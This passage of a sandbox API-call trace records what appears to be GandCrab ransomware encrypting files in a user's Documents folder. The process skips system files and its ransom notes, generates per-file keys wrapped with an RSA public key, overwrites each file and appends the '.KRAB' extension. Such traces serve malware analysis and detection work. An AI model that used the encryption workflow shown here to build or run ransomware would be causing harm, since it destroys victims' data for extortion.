CryptReleaseContext (hProv=0x10114e0, dwFlags=0x0) returned 1 [0090.167] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\K56FGI8e_qPk7EgE.xls" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\n3lnn9eg\\k56fgi8e_qpk7ege.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x774 [0090.168] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0090.168] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0090.168] ReadFile (in: hFile=0x774, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e7fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e7fc*=0xad7f, lpOverlapped=0x0) returned 1 [0090.186] SetFilePointerEx (in: hFile=0x774, liDistanceToMove=0xffff5281, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.187] WriteFile (in: hFile=0x774, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0xad7f, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e7f8*=0xad7f, lpOverlapped=0x0) returned 1 [0090.187] WriteFile (in: hFile=0x774, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338e7f8*=0x208, lpOverlapped=0x0) returned 1 [0090.187] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.191] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.191] CloseHandle (hObject=0x774) returned 1 [0090.192] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.193] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\K56FGI8e_qPk7EgE.xls" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\n3lnn9eg\\k56fgi8e_qpk7ege.xls"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\K56FGI8e_qPk7EgE.xls.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\n3lnn9eg\\k56fgi8e_qpk7ege.xls.krab")) returned 1 [0090.207] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.207] FindNextFileW (in: hFindFile=0x1023278, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0090.207] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2=".") returned 1 [0090.207] lstrcmpW (lpString1="KRAB-DECRYPT.txt", lpString2="..") returned 1 [0090.207] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\", lpString2="KRAB-DECRYPT.txt" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\KRAB-DECRYPT.txt") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\KRAB-DECRYPT.txt" [0090.207] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0090.207] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\KRAB-DECRYPT.txt.KRAB") returned 105 [0090.208] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\KRAB-DECRYPT.txt") returned 100 [0090.208] lstrlenW (lpString=".txt") returned 4 [0090.208] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0090.208] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".txt ") returned 5 [0090.208] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.208] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\KRAB-DECRYPT.txt") returned 100 [0090.208] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\KRAB-DECRYPT.txt") returned 100 [0090.209] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="desktop.ini") returned 1 [0090.209] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="autorun.inf") returned 1 [0090.209] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat") returned -1 [0090.209] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="iconcache.db") returned 1 [0090.209] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="bootsect.bak") returned 1 [0090.209] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="boot.ini") returned 1 [0090.209] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="ntuser.dat.log") returned -1 [0090.209] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="thumbs.db") returned -1 [0090.209] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.html") returned 1 [0090.209] lstrcmpiW (lpString1="KRAB-DECRYPT.txt", lpString2="KRAB-DECRYPT.txt") returned 0 [0090.209] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.209] FindNextFileW (in: hFindFile=0x1023278, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0090.209] lstrcmpW (lpString1="NCVb1PTH.xls", lpString2=".") returned 1 [0090.209] lstrcmpW (lpString1="NCVb1PTH.xls", lpString2="..") returned 1 [0090.209] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\", lpString2="NCVb1PTH.xls" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\NCVb1PTH.xls") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\NCVb1PTH.xls" [0090.209] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0090.211] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\NCVb1PTH.xls.KRAB") returned 101 [0090.211] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\NCVb1PTH.xls") returned 96 [0090.211] lstrlenW (lpString=".xls") returned 4 [0090.211] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0090.212] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".xls ") returned 5 [0090.212] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.212] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\NCVb1PTH.xls") returned 96 [0090.212] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\NCVb1PTH.xls") returned 96 [0090.212] lstrcmpiW (lpString1="NCVb1PTH.xls", lpString2="desktop.ini") returned 1 [0090.212] lstrcmpiW (lpString1="NCVb1PTH.xls", lpString2="autorun.inf") returned 1 [0090.212] lstrcmpiW (lpString1="NCVb1PTH.xls", lpString2="ntuser.dat") returned -1 [0090.212] lstrcmpiW (lpString1="NCVb1PTH.xls", lpString2="iconcache.db") returned 1 [0090.212] lstrcmpiW (lpString1="NCVb1PTH.xls", lpString2="bootsect.bak") returned 1 [0090.212] lstrcmpiW (lpString1="NCVb1PTH.xls", lpString2="boot.ini") returned 1 [0090.212] lstrcmpiW (lpString1="NCVb1PTH.xls", lpString2="ntuser.dat.log") returned -1 [0090.213] lstrcmpiW (lpString1="NCVb1PTH.xls", lpString2="thumbs.db") returned -1 [0090.213] lstrcmpiW (lpString1="NCVb1PTH.xls", lpString2="KRAB-DECRYPT.html") returned 1 [0090.213] lstrcmpiW (lpString1="NCVb1PTH.xls", lpString2="KRAB-DECRYPT.txt") returned 1 [0090.213] lstrcmpiW (lpString1="NCVb1PTH.xls", lpString2="CRAB-DECRYPT.txt") returned 1 [0090.213] lstrcmpiW (lpString1="NCVb1PTH.xls", lpString2="ntldr") returned -1 [0090.213] lstrcmpiW (lpString1="NCVb1PTH.xls", lpString2="NTDETECT.COM") returned -1 [0090.213] lstrcmpiW (lpString1="NCVb1PTH.xls", lpString2="Bootfont.bin") returned 1 [0090.213] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0090.213] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0x1010e80) returned 1 [0090.215] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0090.215] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0090.216] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0090.216] CryptGenRandom (in: hProv=0x1010e80, dwLen=0x20, pbBuffer=0x338e7cc | out: pbBuffer=0x338e7cc) returned 1 [0090.216] CryptReleaseContext (hProv=0x1010e80, dwFlags=0x0) returned 1 [0090.216] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.216] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0x1011898) returned 1 [0090.218] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0090.218] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0090.219] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0090.219] CryptGenRandom (in: hProv=0x1011898, dwLen=0x8, pbBuffer=0x338e7ec | out: pbBuffer=0x338e7ec) returned 1 [0090.219] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0090.219] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.219] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0x10114e0) returned 1 [0090.221] CryptImportKey (in: hProv=0x10114e0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0x1023338) returned 1 [0090.221] CryptGetKeyParam (in: hKey=0x1023338, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0090.221] CryptEncrypt (in: hKey=0x1023338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e75c*=0x100) returned 1 [0090.221] GetLastError () returned 0x0 [0090.221] CryptDestroyKey (hKey=0x1023338) returned 1 [0090.221] CryptReleaseContext (hProv=0x10114e0, dwFlags=0x0) returned 1 [0090.221] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0x10111b0) returned 1 [0090.223] CryptImportKey (in: hProv=0x10111b0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0x1023338) returned 1 [0090.223] CryptGetKeyParam (in: hKey=0x1023338, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0090.223] CryptEncrypt (in: hKey=0x1023338, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e75c*=0x100) returned 1 [0090.223] GetLastError () returned 0x0 [0090.223] CryptDestroyKey (hKey=0x1023338) returned 1 [0090.224] CryptReleaseContext (hProv=0x10111b0, dwFlags=0x0) returned 1 [0090.224] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\NCVb1PTH.xls" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\n3lnn9eg\\ncvb1pth.xls"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x774 [0090.224] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0090.224] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0090.225] ReadFile (in: hFile=0x774, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e7fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e7fc*=0x14145, lpOverlapped=0x0) returned 1 [0090.248] SetFilePointerEx (in: hFile=0x774, liDistanceToMove=0xfffebebb, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.248] WriteFile (in: hFile=0x774, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x14145, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e7f8*=0x14145, lpOverlapped=0x0) returned 1 [0090.248] WriteFile (in: hFile=0x774, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338e7f8*=0x208, lpOverlapped=0x0) returned 1 [0090.248] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.253] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.254] CloseHandle (hObject=0x774) returned 1 [0090.254] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.254] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\NCVb1PTH.xls" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\n3lnn9eg\\ncvb1pth.xls"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\NCVb1PTH.xls.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\n3lnn9eg\\ncvb1pth.xls.krab")) returned 1 [0090.255] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.256] FindNextFileW (in: hFindFile=0x1023278, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0090.256] lstrcmpW (lpString1="Qb15T.pps", lpString2=".") returned 1 [0090.256] lstrcmpW (lpString1="Qb15T.pps", lpString2="..") returned 1 [0090.256] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\", lpString2="Qb15T.pps" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\Qb15T.pps") returned="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\Qb15T.pps" [0090.256] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0090.256] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\Qb15T.pps.KRAB") returned 98 [0090.256] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\Qb15T.pps") returned 93 [0090.256] lstrlenW (lpString=".pps") returned 4 [0090.256] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0090.257] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".pps ") returned 5 [0090.257] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.257] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\Qb15T.pps") returned 93 [0090.257] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\Qb15T.pps") returned 93 [0090.257] lstrcmpiW (lpString1="Qb15T.pps", lpString2="desktop.ini") returned 1 [0090.257] lstrcmpiW (lpString1="Qb15T.pps", lpString2="autorun.inf") returned 1 [0090.258] lstrcmpiW (lpString1="Qb15T.pps", lpString2="ntuser.dat") returned 1 [0090.258] lstrcmpiW (lpString1="Qb15T.pps", lpString2="iconcache.db") returned 1 [0090.258] lstrcmpiW (lpString1="Qb15T.pps", lpString2="bootsect.bak") returned 1 [0090.258] lstrcmpiW (lpString1="Qb15T.pps", lpString2="boot.ini") returned 1 [0090.258] lstrcmpiW (lpString1="Qb15T.pps", lpString2="ntuser.dat.log") returned 1 [0090.258] lstrcmpiW (lpString1="Qb15T.pps", lpString2="thumbs.db") returned -1 [0090.258] lstrcmpiW (lpString1="Qb15T.pps", lpString2="KRAB-DECRYPT.html") returned 1 [0090.258] lstrcmpiW (lpString1="Qb15T.pps", lpString2="KRAB-DECRYPT.txt") returned 1 [0090.258] lstrcmpiW (lpString1="Qb15T.pps", lpString2="CRAB-DECRYPT.txt") returned 1 [0090.258] lstrcmpiW (lpString1="Qb15T.pps", lpString2="ntldr") returned 1 [0090.258] lstrcmpiW (lpString1="Qb15T.pps", lpString2="NTDETECT.COM") returned 1 [0090.258] lstrcmpiW (lpString1="Qb15T.pps", lpString2="Bootfont.bin") returned 1 [0090.258] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0090.258] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0x1010bd8) returned 1 [0090.260] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0090.260] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0090.261] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0090.261] CryptGenRandom (in: hProv=0x1010bd8, dwLen=0x20, pbBuffer=0x338e7cc | out: pbBuffer=0x338e7cc) returned 1 [0090.261] CryptReleaseContext (hProv=0x1010bd8, dwFlags=0x0) returned 1 [0090.261] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.261] CryptAcquireContextW (in: phProv=0x338e734, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e734*=0x1011018) returned 1 [0090.263] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3000000 [0090.267] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0090.267] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0090.267] CryptGenRandom (in: hProv=0x1011018, dwLen=0x8, pbBuffer=0x338e7ec | out: pbBuffer=0x338e7ec) returned 1 [0090.267] CryptReleaseContext (hProv=0x1011018, dwFlags=0x0) returned 1 [0090.267] VirtualFree (lpAddress=0x3000000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.268] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0x1011018) returned 1 [0090.270] CryptImportKey (in: hProv=0x1011018, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0x10235f8) returned 1 [0090.270] CryptGetKeyParam (in: hKey=0x10235f8, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0090.270] CryptEncrypt (in: hKey=0x10235f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338e75c*=0x100) returned 1 [0090.271] GetLastError () returned 0x0 [0090.271] CryptDestroyKey (hKey=0x10235f8) returned 1 [0090.271] CryptReleaseContext (hProv=0x1011018, dwFlags=0x0) returned 1 [0090.271] CryptAcquireContextW (in: phProv=0x338e72c, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338e72c*=0x1011678) returned 1 [0090.273] CryptImportKey (in: hProv=0x1011678, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338e730 | out: phKey=0x338e730*=0x10235f8) returned 1 [0090.273] CryptGetKeyParam (in: hKey=0x10235f8, dwParam=0x8, pbData=0x338e724, pdwDataLen=0x338e728, dwFlags=0x0 | out: pbData=0x338e724*=0x800, pdwDataLen=0x338e728*=0x4) returned 1 [0090.273] CryptEncrypt (in: hKey=0x10235f8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338e75c*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338e75c*=0x100) returned 1 [0090.273] GetLastError () returned 0x0 [0090.273] CryptDestroyKey (hKey=0x10235f8) returned 1 [0090.273] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0090.273] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\Qb15T.pps" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\n3lnn9eg\\qb15t.pps"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x774 [0090.274] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0090.274] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0090.275] ReadFile (in: hFile=0x774, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338e7fc, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338e7fc*=0x102d4, lpOverlapped=0x0) returned 1 [0090.295] SetFilePointerEx (in: hFile=0x774, liDistanceToMove=0xfffefd2c, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0090.295] WriteFile (in: hFile=0x774, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x102d4, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338e7f8*=0x102d4, lpOverlapped=0x0) returned 1 [0090.295] WriteFile (in: hFile=0x774, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338e7f8, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338e7f8*=0x208, lpOverlapped=0x0) returned 1 [0090.296] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.299] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.300] CloseHandle (hObject=0x774) returned 1 [0090.300] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.301] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\Qb15T.pps" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\n3lnn9eg\\qb15t.pps"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\Qb15T.pps.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\documents\\fexht9x87hw5ftqpcrnk\\x5rboxa2\\rd0j9efztigt\\n3lnn9eg\\qb15t.pps.krab")) returned 1 [0090.301] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0090.302] FindNextFileW (in: hFindFile=0x1023278, lpFindFileData=0x338e850 | out: lpFindFileData=0x338e850) returned 1 [0090.302] lstrcmpW (lpString1="sPy97gpP.odt", lpString2=".") returned 1 [0090.302] lstrcmpW (lpString1="sPy97gpP.odt", lpString2="..") returned 1 [0090.302] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Documents\\fEXHt9X87hw5FTqPcrNK\\x5rBOxA2\\rd0j9efZtIGt\\N3LNN9Eg\\", lpString2="sPy97gpP.odt" | out: 